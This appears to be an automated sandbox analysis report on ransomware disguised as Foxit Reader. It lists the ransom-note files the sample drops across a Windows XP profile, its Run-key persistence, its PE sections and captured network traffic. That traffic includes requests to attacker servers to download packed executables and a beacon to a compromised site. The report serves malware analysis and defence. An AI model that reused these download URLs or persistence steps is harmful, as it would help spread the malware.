%Documents and Settings%\%current user%\Application Data\Microsoft\SystemCertificates\My\Certificates\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\All Users\Documents\My Music\Sample Playlists\00064D96\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\NetworkService\Application Data\Microsoft\Credentials\S-1-5-20\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\LocalService\Local Settings\Application Data\Microsoft\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Application Data\Identities\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\My Documents\Recovery_File_koseqijge.txt (250 bytes)
%Documents and Settings%\NetworkService\Application Data\Microsoft\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\KP27CLYF\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Adobe\Reader 9.3\Setup Files\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\12\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\Default User\Application Data\Microsoft\SystemCertificates\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\Default User\Start Menu\Programs\Accessories\Entertainment\restore_files_fyiyk.html (5 bytes)
C:\RECYCLER\S-1-5-21-1844237615-1960408961-1801674531-1003\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\22\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Application Data\Adobe\Flash Player\AssetCache\E7VJ4HGS\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\0\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\LocalService\Application Data\Microsoft\SystemCertificates\My\Certificates\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\Administrative Tools\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\Default User\Desktop\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\6\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Cookies\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Microsoft\Media Player\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\Default User\Start Menu\Programs\Accessories\Accessibility\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\Crypto\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\#kiks.yandex.ru\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Application Data\Macromedia\Flash Player\#SharedObjects\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\Default User\Local Settings\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\Default User\Local Settings\Temporary Internet Files\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Local Settings\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\LocalService\Application Data\Microsoft\SystemCertificates\My\CTLs\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\CHEZ8TER\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\All Users\Favorites\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\0\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\51\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\19\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\51\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\4\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\12\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\53\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\16\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\16\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\19\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\LocalService\Local Settings\Application Data\Microsoft\Credentials\S-1-5-19\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\All Users\Documents\My Music\Sample Playlists\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\NetworkService\Local Settings\Application Data\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\56\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\55\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\Protect\S-1-5-21-1844237615-1960408961-1801674531-1003\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\Internet Explorer\Quick Launch\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\LocalService\Application Data\Microsoft\SystemCertificates\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\2\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\43\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\Default User\Local Settings\History\History.IE5\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\48\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\3\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\LocalService\Local Settings\History\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\29\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\Default User\Desktop\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\5\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Adobe\Acrobat\9.0\Cache\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\jre1.6.0_18\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\Default User\Application Data\Microsoft\SystemCertificates\My\Certificates\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\Default User\Templates\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\57\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\NetworkService\Local Settings\Application Data\Microsoft\Credentials\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Local Settings\History\History.IE5\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Microsoft\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\SendTo\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\LocalService\Local Settings\History\History.IE5\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Application Data\Identities\{37E80C13-CB45-4DCE-A438-545B791476AC}\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\Total Commander\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\NetworkService\Local Settings\History\History.IE5\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\812Z098J\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\41\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\My Documents\My Pictures\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\1\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\UserData\KTOR0Z81\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\LocalService\Application Data\Microsoft\Credentials\S-1-5-19\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\Default User\Local Settings\Temporary Internet Files\Content.IE5\CHEZ8TER\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\15\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\12\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Recent\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\Default User\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\My Documents\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\HTML Help\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\Default User\Start Menu\Programs\Startup\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\can\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\31\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\4\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\18\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\Startup\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\LocalService\Cookies\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Recent\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\Content\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\34\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\Default User\Start Menu\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\11\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Adobe\Linguistics\Dictionaries\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\60\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\Games\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\Default User\Favorites\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\6\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\LocalService\Local Settings\Application Data\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\24\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Adobe\Reader 9.3\Setup Files\Reader9\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Microsoft\Windows Media\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\Accessories\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\31\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\Default User\Local Settings\History\History.IE5\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\host\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\43\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Adobe\Linguistics\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\Default User\Start Menu\Programs\Accessories\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\41\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\24\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Microsoft\Credentials\S-1-5-21-1844237615-1960408961-1801674531-1003\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\13\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\Internet Explorer\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\NetworkService\Local Settings\Application Data\Microsoft\Windows\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Adobe\Updater6\Install\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\Protect\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Application Data\Macromedia\Flash Player\#SharedObjects\QEA5Z3QJ\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\#kiks.yandex.ru\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Templates\wordpfct.wpd (892 bytes)
%Documents and Settings%\%current user%\Favorites\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\32\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\21\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\Media Player\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\LocalService\Application Data\Microsoft\Credentials\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\10\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\57\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\Default User\Application Data\Microsoft\Media Player\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\50\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\40\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\SystemCertificates\My\CRLs\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\50\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\61\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\15\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\All Users\Documents\My Pictures\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\NetworkService\Application Data\Microsoft\Credentials\restore_files_fyiyk.txt (2 bytes)
%System%\config\SOFTWARE.LOG (4454 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\15\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Application Data\Adobe\Acrobat\9.0\JavaScripts\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\63\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\Crypto\RSA\restore_files_fyiyk.html (5 bytes)
C:\totalcmd\HISTORY.TXT (3890 bytes)
%Documents and Settings%\Default User\Templates\winword.doc (426 bytes)
%Documents and Settings%\NetworkService\Local Settings\Temporary Internet Files\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\8\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\45\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\21\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Adobe\Updater6\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\All Users\Documents\My Music\My Playlists\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Templates\restore_files_fyiyk.txt (2 bytes)
C:\totalcmd\SIZE!.TXT (1606 bytes)
%Documents and Settings%\%current user%\UserData\YJM90VAL\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\Default User\SendTo\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Adobe\Linguistics\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\52\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\Default User\Local Settings\Application Data\Microsoft\Media Player\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Macromedia\Flash Player\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Microsoft\Windows Media\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\NetworkService\Cookies\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\30\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\5\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\30\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\5\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\Default User\Templates\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\19\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\All Users\Documents\My Pictures\Sample Pictures\Blue hills.jpg (502 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Microsoft\Internet Explorer\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\All Users\Templates\restore_files_fyiyk.txt (2 bytes)
C:\RECYCLER\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\19\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\36\restore_files_fyiyk.txt (2 bytes) - Delete the following value(s) in the autorun key (How to Work with System Registry):
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"ms-helper" = "%Documents and Settings%\%current user%\Application Data\vcwuwa.exe"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"ms-helper" = "C"
- Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
- Reboot the computer.
Static Analysis
VersionInfo
Company Name: Foxit Software Inc.
Product Name: Foxit Reader
Product Version: 7.0.8.1216
Legal Copyright: Copyright (c) 2004-2014 Foxit Software Inc. All Rights Reserved.
Legal Trademarks:
Original Filename: Foxit Reader.EXE
Internal Name: Foxit Reader.exe
File Version: 7.0.8.1216
File Description: Foxit Reader 7.0, Best Reader for Everyday Use!
Comments:
Language: English (United States)
PE Sections
Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
---|---|---|---|---|---|
.text | 4096 | 61162 | 61440 | 4.56334 | 876645dd835655ca9d458e76a939d515 |
.rdata | 65536 | 24750 | 25088 | 4.45346 | d61e42a264a1504102ce528365744c7d |
.data | 94208 | 12384 | 4608 | 2.49231 | 6494cc77129d27132ffab1f5adac3692 |
.nata | 110592 | 5166 | 5632 | 4.80809 | 7dad4d85b40a7dec812f9b4ca0b2026c |
.sidata | 118784 | 5856 | 6144 | 5.29212 | 20bdb60bffec29633c67c8c9d2244961 |
.feta | 126976 | 3370 | 3584 | 5.20337 | 1af03a06d88766c117086a2885d7a566 |
.tls | 131072 | 9 | 512 | 0 | bf619eac0cdf3f68d496ea9344137e8b |
.rsrc | 135168 | 67840 | 68096 | 3.16176 | 1a1467e77ce5ac22b2c90bd1f218837d |
Network Activity
URLs
URL | IP |
---|---|
hxxp://104.200.78.119/1.php | |
hxxp://104.200.78.119/2.php | |
hxxp://104.200.78.119/3.php | |
hxxp://104.200.78.119/4.php | |
hxxp://104.200.78.119/5.php | |
hxxp://104.200.78.119/6.php | |
hxxp://104.200.78.119/7.php | |
hxxp://ipinfo.io/ip | 54.93.139.144 |
hxxp://mustdecor.com.br/wp-content/themes/twentythirteen/misc.php?D0B1745184D4B19325F8CA239D78E8043E59CF773AABE120FD67CB28E383F42D2D5B21A73313DC662B52BA4BB99A03658B21C0DB01C7752BEAEDBC5C0BE507C7CF30C1F5FB72777B7B7B8450978E6CF2C3FF983FADB2756AF3B5A7B8D3E8CD3B525EA22594F43E4F0E8B2A05651F90140C794C275A45A66E916A065FC3FBA9379F91432F1BAF081FE9FD060D66B1FDE418C48A871F4903EF9FD15252584C541E94F6FEFA9ED73147FD92C2F65816C3E30DA412C2E9A9255D6F4B984CF7E3FA8AE02C34F482E7A3D70D9AFE521ED91860808C876A2662E70FE484005836228180 | 5.9.62.196 |
hxxp://134.90.100.78/moon011.exe | |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
Traffic
GET /5.php HTTP/1.1
Host: 104.200.78.119
HTTP/1.1 200 OK
Date: Fri, 04 Sep 2015 00:41:44 GMT
Server: Apache/2.2.15 (CentOS) DAV/2 mod_fastcgi/2.4.6
X-Powered-By: PHP/5.3.3
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html
0..
GET /wp-content/themes/twentythirteen/misc.php?D0B1745184D4B19325F8CA239D78E8043E59CF773AABE120FD67CB28E383F42D2D5B21A73313DC662B52BA4BB99A03658B21C0DB01C7752BEAEDBC5C0BE507C7CF30C1F5FB72777B7B7B8450978E6CF2C3FF983FADB2756AF3B5A7B8D3E8CD3B525EA22594F43E4F0E8B2A05651F90140C794C275A45A66E916A065FC3FBA9379F91432F1BAF081FE9FD060D66B1FDE418C48A871F4903EF9FD15252584C541E94F6FEFA9ED73147FD92C2F65816C3E30DA412C2E9A9255D6F4B984CF7E3FA8AE02C34F482E7A3D70D9AFE521ED91860808C876A2662E70FE484005836228180 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:31.0) Gecko/20100101 Firefox/31.0
Host: mustdecor.com.br
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Thu, 03 Sep 2015 23:32:58 GMT
Server: Apache/2.2.22 (Ubuntu)
X-Powered-By: PHP/5.3.10-1ubuntu3.8
Vary: Accept-Encoding
Content-Length: 25
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html
---!!!INSERTED!!!---....1
GET /3.php HTTP/1.1
Host: 104.200.78.119
HTTP/1.1 200 OK
Date: Fri, 04 Sep 2015 00:41:43 GMT
Server: Apache/2.2.15 (CentOS) DAV/2 mod_fastcgi/2.4.6
X-Powered-By: PHP/5.3.3
Content-Length:
Connection: close
Content-Type: text/html
GET /4.php HTTP/1.1
Host: 104.200.78.119
HTTP/1.1 200 OK
Date: Fri, 04 Sep 2015 00:41:44 GMT
Server: Apache/2.2.15 (CentOS) DAV/2 mod_fastcgi/2.4.6
X-Powered-By: PHP/5.3.3
Content-Length:
Connection: close
Content-Type: text/html
GET /2.php HTTP/1.1
Host: 104.200.78.119
HTTP/1.1 200 OK
Date: Fri, 04 Sep 2015 00:41:43 GMT
Server: Apache/2.2.15 (CentOS) DAV/2 mod_fastcgi/2.4.6
X-Powered-By: PHP/5.3.3
Content-Length: 66298
Connection: close
Content-Type: text/html
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Q..S....................................z.......z.......z.......#.......#...............................Rich............................PE..L...,..U.................0..........0.............@.................................................................................................................................................................................................UPX0.....................................PX1.....0..........................@....rsrc................2..............@......................................................................................................................................................................................................................................................................................................................................................................3.08.UPX!.....A4 ...u....),......&.........6@....%..j8...Y...M.3.;.7..}E.t...J.M.d......{...DC1..0`...?h.:w......7MV...uF....e.s/J.F(..4.Kv.[.W....^Z3.~..n..D$..t.VT.Y!.....~..$ZX.e..J..Vn..DN.~$.u....v{^..x..SP...@$..?..$W....'P...3.Yf....f.....f.G.9V$.N.~%S.G..Y..X....o.........`.y..B...;&|.[..k.WV.W..j.X_^...,.B.. SVW.e......}..M.j.3...Q...]..P<...t2j..P.%..;..9..........H...h.LWP....k4.&.f.}..M9._.2!...E.m..n..P.9......o.[.u.^.....0..v.R<..........@.P.....E....v <..1....?3..-M....k....9,.._.[.hx...L..S.W.v3l.3....f..........(0.6..
<<< skipped >>>
GET /ip HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: ipinfo.io
HTTP/1.1 200 OK
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Date: Thu, 03 Sep 2015 23:32:57 GMT
Server: nginx/1.6.2
Content-Length: 15
Connection: keep-alive
194.242.96.218.
GET /6.php HTTP/1.1
Host: 104.200.78.119
HTTP/1.1 200 OK
Date: Fri, 04 Sep 2015 00:41:44 GMT
Server: Apache/2.2.15 (CentOS) DAV/2 mod_fastcgi/2.4.6
X-Powered-By: PHP/5.3.3
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html
0..
GET /1.php HTTP/1.1
Host: 104.200.78.119
HTTP/1.1 200 OK
Date: Fri, 04 Sep 2015 00:41:43 GMT
Server: Apache/2.2.15 (CentOS) DAV/2 mod_fastcgi/2.4.6
X-Powered-By: PHP/5.3.3
Content-Length: 334312
Connection: close
Content-Type: text/html
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........K...%...%...%.I./...%...6...%...%...%.". .0.%.I./...%.I./...%.I./...%...$...%.Rich..%.........PE..L...=.G@..........................................@..................................#......................................$...x....@..x5..............................................................................P............................text............................... ..`.rdata... .......0..................@..@.data....0..........................@....rsrc...x5...@...@..................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
<<< skipped >>>
GET /7.php HTTP/1.1
Host: 104.200.78.119
HTTP/1.1 200 OK
Date: Fri, 04 Sep 2015 00:41:44 GMT
Server: Apache/2.2.15 (CentOS) DAV/2 mod_fastcgi/2.4.6
X-Powered-By: PHP/5.3.3
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html
0..
Strings from Dumps
bryehretgw.exe_1900:
explorer.exe
kernel32.dll
user32.dll
wsock32.dll
Ws2_32.dll
HTTP/1.0
/moon011.exe
HTTP/1.1
Content-Type: application/x-www-form-urlencoded
HTTP/1.
ntdll.dll
GetProcessHeap
.text
`.rdata
@.data
.reloc
/`.rdBa
KERNEL32.DLL
ADVAPI32.dll
USER32.dll
bryehretgw.exe_1900_rwx_00400000_02328000:
explorer.exe
kernel32.dll
user32.dll
